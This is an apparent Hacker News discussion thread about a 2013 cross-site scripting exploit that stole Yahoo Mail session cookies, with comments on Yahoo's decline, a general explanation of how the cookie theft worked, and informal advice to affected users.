

Yahoo Mail users hit by widespread XSS exploit - macleanjr
http://thenextweb.com/insider/2013/01/07/yahoo-mail-users-hit-by-widespread-hacking-xss-exploit-seemingly-to-blame

======
neya
Whenever I hear something negative about Yahoo, I feel really sorry for them.
Yahoo used to be a great company a few years back. Their messenger was one of
the best products they ever had, their mail used to be REALLY good (in the
early days). But soon, they failed to adapt with the market's needs and they
are now here where they are. They COULD have been a great company if they had
put in as much effort as their competitors had put in, in understanding their
market.

The best example was about how they failed to respond to Gmail's popularity.
Gmail gave almost every single feature away for free, that Yahoo charged (and
still charges?) a premium for. For example - Mail forwarding, (POP, IMAP too?)
and so on. I personally used to have a .co.uk address with them and eventually
moved to Gmail because their ads were into my face, unlike Gmail's, where they
are very subtle.

Also the UX on most Yahoo's sites are terribly poor. Ever visited their
homepage? Looks like a cluttered fish market.

~~~
csmatt
Bad UX killed Yahoo. Intrusive, animated advertisements and a cluttered home
page are how I will always remember them. I often joke about how I test
Internet connections by going to yahoo.com in the browser since no one goes
there anymore and I won't be deceived by cache :P

~~~
TazeTSchnitzel
In the US, perhaps. The "cluttered homepage" design is popular in Japan.

~~~
jpatokal
It's not quite that simple: [http://www.tofugu.com/2012/05/15/japanese-web-
design-why-you...](http://www.tofugu.com/2012/05/15/japanese-web-design-why-
you-so-2003/)

~~~
TazeTSchnitzel
Thanks for that, that was quite enlightening.

------
gcb0
So, why does the browser send yahoo.com cookies to a request to
abysswhatever.com when the user clicks on the link in the email?

he just created a pretty valid link with no shenanigans... last i checked, a
XSS attack was about making a site churn out javascript code when it was not
intended to and then you could make a request that passed that domain's
cookies to you.

~~~
mrb
The browser doesn't send yahoo.com cookies to abysssec.com. The way XSS's work
in general is that the attacker's landing page probably has an invisible
iframe that GETs or POSTs to yahoo.com, with the right parameters, to trigger
an XSS with js code that sends the cookies back to abysssec.com All this is
invisible in the video, as the author does not want to disclose the technical
details.

~~~
bcoates
It sounds like disabling 3rd party cookies fixes this, right?

~~~
dmix
The cookie is a first-party yahoo cookie that is sent via a GET parameter to a
remote server in plain-text.

So nope that won't help.

------
eric-hu
I believe my Yahoo account was hit by this, since my sent mailbox showed
messages with links similar to one I accidentally clicked (from a Gmail
account!).

The comments in this thread suggest that the attackers now have my cookies.
What can I do to invalidate old cookies for Yahoo mail?

~~~
Timothee
The least you can do is change your password. I don't know if Yahoo! can log
you out of your account in other locations, the way Gmail does.

------
xSwag
Exploit in action: <http://www.youtube.com/watch?v=iBXvebXo-F4>

It is currently being sold for $700 in various semi-public blackhat forums
(hence widespread usage).

------
ppierald
A little heads up to the Yahoo Security team probably would have been
appreciated!

~~~
daeken
It's not like this was someone revealing the vulnerability, though. The first
knowledge of it was an in-the-wild attack; not much you can do about it at
that point.

------
randallu
So does YMail have anything to do with this -- if you were logged into Yahoo
and visited the bad page then Evil, Inc would still get your Y and T cookies,
right?

I have received "Check out this cool link" emails from friends who use Yahoo
mail, but I assumed that it was just scraping their Yahoo address book...

------
mifrai
Would following their advice of changing your password actually help in this
situation? While it's a good practice in general, if I'm understanding this
right, the attacker never has your password.

~~~
mullingitover
It's an xss attack that takes advantage of the fact that you're logged in,
they don't need your password. The best way to avoid it is to only log into
your account in a separate browser that's in incognito mode. That, or log out
of your Yahoo account immediately after you've done your business with them
and don't hit any other web sites while you're logged in.

------
kbanman
I personally witnessed two instances of this attack as early as December 8. I
couldn't figure out until now how it was done.

~~~
mrb
How did you "witness" them? Were they doing js popups from yahoo.com?

------
Simucal
Already, two of my Facebook friends have reported they have been hit with this
vulnerability.

~~~
mrb
How technical are your friends? Sometimes people think they have been "hacked"
when their contacts receive spam with their name in the From: header. That is
not the case at all. Spammers simply spoof the From:. No hack required.

Beside, this XSS vulnerability is silent by nature. The victim has no idea and
no visual indication that clicking a link ends up stealing his/her Yahoo auth
cookies.

~~~
Pr0
Sure, but if the victim sends the same email to all of their friends, he or
she will surely end up finding out.

~~~
mrb
Spammers also have ways to determine your social circle (eg. scraping
Facebook), so they can send mail to all your friends.

~~~
LarrySDonald
Depends on how visible your name->email is. I got one yesterday to my current
non-public email address (never used for anything except person to person
email, and usually not even that), from the one guy I know who uses yahoo
email. Told him he might want to make sure his AV is in shape and change his
password. Still no idea if it's from this or something else, he discovered
that he had a bit of malware (nothing extreme, your average user level) so it
could have been anything, but the timing is pretty suspicious considering his
setup has gotten infected exactly once over about the four years I've known
him (that I know of, but I have no doubt I'd be the first to know).

------
mikekij
People still use Yahoo mail?

~~~
waitwhat
More than use Gmail -- [http://www.campaignmonitor.com/resources/will-it-
work/email-...](http://www.campaignmonitor.com/resources/will-it-work/email-
clients/)

~~~
dvhh
read the fine print, it could mean that iOS mail client don't care that much
about privacy. Almost all mail client hide external image by default (and a
whitelist mechanism).

